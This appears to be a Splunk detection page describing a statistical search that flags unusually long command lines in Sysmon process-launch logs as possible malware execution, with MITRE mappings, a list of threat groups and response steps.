Malicious Command Line Executions

Description

Ransomware and other malware variants often execute long commands using command line arguments. This search performs statistical analysis of these CLI arguments to detect potentially malicious executions.


Use Case

Advanced Threat Detection

Category

Endpoint Compromise

Alert Volume

Medium (?)

SPL Difficulty

Basic

Journey

Stage 3

MITRE ATT&CK Tactics

Execution
Defense Evasion

MITRE ATT&CK Techniques

Command-Line Interface
Scripting

MITRE Threat Groups

APT1
APT18
APT19
APT28
APT29
APT3
APT32
APT37
APT38
APT39
APT41
BRONZE BUTLER
Cobalt Group
Dark Caracal
Darkhotel
Deep Panda
Dragonfly 2.0
FIN10
FIN4
FIN5
FIN6
FIN7
FIN8
Gallmaker
Gamaredon Group
Gorgon Group
Honeybee
Ke3chang
Lazarus Group
Leafminer
Leviathan
Machete
Magic Hound
MuddyWater
OilRig
Patchwork
Rancor
Silence
Soft Cell
Sowbug
Stealth Falcon
Suckfly
TA459
TA505
Threat Group-1314
Threat Group-3390
Turla
WIRTE
admin@338
menuPass

Kill Chain Phases

Installation

Data Sources

Windows Security
Endpoint Detection and Response

   How to Implement

In order to run this search you need to index Sysmon data from your Windows endpoints. However, you can modify the search o use data from other sources that capture command lines, such as endpoint products like Carbon Black, or Windows process creation events. Process creation events are not enabled by default, but can be enabled via GPO.

   Known False Positives

None at the moment

   How To Respond

When this search fires, you want to validate that the process and the command line are legitimate. You should begin a standard incident response process by validating the process is legitimate and the command-line options for the process are also legitimate. You should investigate what actions were taking by this process and verify any action taken by the process.

   Help

Malicious Command Line Executions Help

Ransomware and other malware variants often execute long commands using command line arguments. This search performs statistical analysis of these CLI arguments to detect potentially malicious executions.

SPL for Malicious Command Line Executions

Demo Data

First we pull in our demo dataset. This could be any EDR data source that provides the full CLI string.
Because we just care about process launches, we filter for EventCode 1, which is how Sysmon denotes a process launch.
Next we use eval to calculate how long the command line (file path + command line args) is.
Eventstats is like stats, but just adds the results to your existing dataset. So this will give us the avg and stdev per each host.
Finally we use stats to roll up multiple process launches, giving us the length of that cli string alongside the avg and stdev of the host, per host, per cli string.
With that setup, we can find processes that have substantially longer cli strings (10 * the standard deviation) than the average on this system.

Live Data

First we pull in our basic dataset, which consists of XML format Sysmon logs from the endpoints (ingested via the Sysmon TA). This could be any EDR data source that provides the full CLI string. Because we're looking for process launches, we then filter for EventCode=1 (the Sysmon Process Launch code).
Next we use eval to calculate how long the command line (file path + command line args) is.
Eventstats is like stats, but just adds the results to your existing dataset. So this will give us the avg and stdev of the command line length per host.
Finally we use stats to roll up multiple process launches, giving us the length of that cli string alongside the avg and stdev of the host, per host, per cli string.
With that setup, we can find processes that have substantially longer cli strings (10 * the standard deviation) than the average on this system.